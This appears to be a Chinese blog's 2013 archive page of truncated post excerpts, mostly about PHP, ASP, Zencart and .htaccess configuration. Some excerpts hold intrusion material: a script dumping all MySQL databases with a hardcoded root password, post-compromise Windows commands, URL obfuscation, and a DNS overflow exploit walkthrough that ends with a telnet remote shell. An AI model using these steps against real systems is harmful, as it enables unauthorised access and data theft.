11 2013 档案
摘要:';while ($row = mysql_fetch_array($result)) {@mysql_select_db($row[0]);system("/usr/bin/mysqldump $row[0] -u root -phaven|gzip>/home/havenhu/db_bak/$row[0]".date('Ymd').".gzl");//99a9c92d753df9e4541af3ad9d9c35fb:62 是密码123456//@mysql_query("update admin set adm
阅读全文
摘要:dos下下载远程服务器的文件setp C:\WINDOWS\system32\cmd.exesetp C:\RECYCLER\cmd.exever --------查看window版本net userwhoamiC:\RECYCLER\pr2....
阅读全文
摘要:有时在一些虚拟主机下(如HostMonster,BlueHost),Zencart网站会莫名奇妙输出空白页面,查看HTTP头,其实可以看到是500错误。至于500错误的出现原因,一般是由于服务器脚本或是.htaccess有错误。因为是空白页面没有输出具体的错误位置,所以排查起来很困难。以下方法是让网站显示了具体的错误位置,错误内容等代码。application_top.php放入error_reporting(9);function onError($errNo, $errMsg, $file, $line, $errcontext) { $report_title ='错误报告
阅读全文
摘要:加密所在的地方:http://tool.chinaz.com/Tools/UrlCrypt.aspx?url=www.baidu.com 结果: http://%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D/ 替换:http://\x77\x77\x77\x2...
阅读全文
摘要:想要保护admin文件夹,经过以下两个步骤:步骤一、可以用记事本新建文件.htaccess,输入以下内容:AuthType BasicAuthUserFile D:/AppServ/www/Hill/admin/.htpasswdAuthName “hill”require valid-user各行不多解释,关键是第二行,一定要是绝对路径,表示.htpasswd文件的位置。(位置任意)然后把这个名为.htaccess的文件放到admin文件夹中。步骤二、下面就是新建一个名为.htpasswd的文件,名字应该和上面第二行一致。简单的方法:开始-运行-cmd-apache>bin\htpas
阅读全文
摘要:file() 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换行符在内。按换行回车来分段print_r(file("body.txt")); 用Ep替换文件\n----------为空就可以 print_r(file("test.txt")); 用数组输出$body= file_get_contents("url.txt");$bodyfile=explode(',',$body);用隔分 然后再数组输出print_r($bodyfile);for ( $v=0;$v ".$data[ra
阅读全文
摘要:http://www.l0phtcrack.com/download.html打开apache配置文件httpd.conf配置如下:网站根目录OptionsNoneAllowOverrideAuthConfigOrderallow,denyAllowfromall如果你想加密整个网站就在根目录下建.htaccess文件,如果你想加密根目录下的某个文件夹如在hydra下的ceshi文件夹那么就在ceshi下建立.htaccess文件.htaccess文件内容如下AuthUserFile/var/www/.passwd.passwd文件稍后新建位置最好不要在web目录下AuthName"
阅读全文
摘要:mod_zencart_magiczoom使用一、复制相应文件到相应目录。二、安装sql文件。三、按照正确命名上传商品图片,一般需要中图跟大图。四、程序运行时会在images目录下创建magicthumbs目录,并根据商品图片,每个商品自动生成两张图片用于前台显示,生成图片的尺寸可以在后台设置,前台也可以用CSS控制显示。五、中图输出模板在文件magiczoom.module.core.class.php中大约130行处修改。六、去掉顶部标题,修改文件magiczoom.module.core.class.php,去掉$title变量:return "read()){if(!is_d
阅读全文
摘要:2011-04-27 12:00:24|分类: 默认分类 |字号订阅网上有很多文本分割软件都是按字节大小来分割的,主要用于小说类的文本分割,对于比较有规则的内容按行数进行分割非常不方便,所以我写了一个按行数把文本文件分割成多个文本文件主要作用:比如您获取上万个长尾关键词,你想通过随机的方式调用100条或者50条。假如是只有一个文本文件(上万行),你需要读取该文件所有行到数组,然后打乱数组,读取前50条,效率非常低。而你把该文本文件用分割器分割成1.txt 2.txt…… 100.txt(随机打乱了行数),那么你只要先随机从1-100中产生一个随机数然后读取该随机数文本(比如55对应 55.tx
阅读全文
摘要:cpanel 中重定向Redirects:talen.eu/*redirects to →http://www.hotel.eu 无需点Wild Card RedirectRewriteCond %{HTTP_HOST} ^wien-.net [NC]RewriteRule ^(.*)$ http:...
阅读全文
摘要:Asp获取网址相关参数大全代码一:【获取地址中的文件名,不包含扩展名】代码二:【获取地址参数】代码三:【获取全部地址参数,包括?及后面的参数】0) thenurl=url & "?" & request.ServerVariables("QUERY_STRING")end ifresponse.Write url%>0 ThenFor each querystring in Request.QueryString query = query+querystring&"="&Request.Quer
阅读全文
摘要:使用ASP加密算法加密你的数据(一)简介首先简单介绍一下有关加密的背景。由于美国禁止几种密码算法的对外出口的加密位数(例如SSL的40位加密限制),本文将介绍一种ASP可以使用的简单字符加密算法,而不是那些受限制的加密算法。其实,这里介绍的加密算法对于一般的运用来说已经足够解密人麻烦一阵子的了。它的加密基础是最简单的Vernum密码方法,我将在下一篇文章中介绍这种密码。它的基本原理是,需要有一个需要加密的明文和一个随机生成的解密钥匙文件。然后使用这两个文件组合起来生成密文。(明文)组合(密钥)=加密后的密文所以本文介绍的是生成密钥的代码。我们假设我们生成的密钥为512位长的密钥,它已经足够来加
阅读全文
摘要:sitemap.xml生成方法(asp和php)(转)http://teachmyself.blog.163.com/blog/static/18881422920119895435272/sitemap.xml是一种站点地图协议,此协议文件基于早期的robots.txt文件协议,并有所升级。向搜索引擎中提交了sitemap.xml的 网站将更有利于搜索引擎网页爬行机器人的爬行索引,这样将提高索引网站内容的效率和准确度。 一共有六个标签,changefreq:页面内容更新频率;lastmod:页面最后修改时间;loc:页面永久链接地址;priority:相对于其他页面的优先权(这个标签可以不.
阅读全文
摘要:fputs(fopen('a.php','w'),'');php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的。这个着实让人蛋疼。后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间后,此IP就访问一个莫名奇妙文件,名字很显眼明显不是正常系统文件,而是PHP后门。但是很快使
阅读全文
摘要:对某PHP程序解密过程作者:蒲松林发布时间:2013年09月02日所在分类:代码评论数:暂无评论对于程序加密可能是出于程序创作者对于自己的产品产权保护、授权验证,也有一些人把一些后面程序以及黑链等加密发布的。在给朋友用的一套程序中发现index.php被加密了。一些站长朋友是不是经常会看到类似的加密?默认的index.php肯定不是这样的,那么我们今天就来一步一步的对这个PHP程序进行解密。蒲松林了解到这类加密就是采用了微盾的方式进行的,我们姑且不去管网上有对应的解密工具,直接手工吧。源代码如下:index.php源代码PHP123解密方法如下:index.php加密后的解密方法PHP1234
阅读全文
摘要:1、2000系统 简要说一下如何进行DNS溢出攻击。我用的溢出利用程序是dns.exe,在CMD下运行它可以看到它的使用参数等信息。执行"dns -s IP"命令检测目标IP是否存在DNS溢出漏洞。在图中我们可以看出目标主机存在DNS溢出漏洞,操作系统为Windows 2000!接着我们进行溢出攻击,执行"dns -t 2000all IP 1207"后提示要我们检测返回的1100端口的shell。"telnet IP 1100"成功得到返回的cmdshell。注意目录为c:\WINNT\system32,顶部也明显可以看到Windo
阅读全文